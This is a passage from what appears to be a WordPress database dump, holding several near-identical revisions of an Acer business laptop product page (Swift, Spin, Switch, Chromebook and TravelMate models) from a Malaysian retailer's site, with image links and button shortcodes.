Solution</h3>\r\n[br][br]\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:28:23','2019-09-17 09:28:23','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3103,1,'2019-09-17 17:29:44','2019-09-17 09:29:44','<h3>Business Product Solution</h3>\r\n<br>\r\n<br>\r\n<br>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:29:44','2019-09-17 09:29:44','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3102,1,'2019-09-17 17:28:57','2019-09-17 09:28:57','<h3>Business Product Solution</h3>\r\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:28:57','2019-09-17 09:28:57','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3105,1,'2019-09-17 17:30:36','2019-09-17 09:30:36','<h1>Business Product Solution</h1>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" 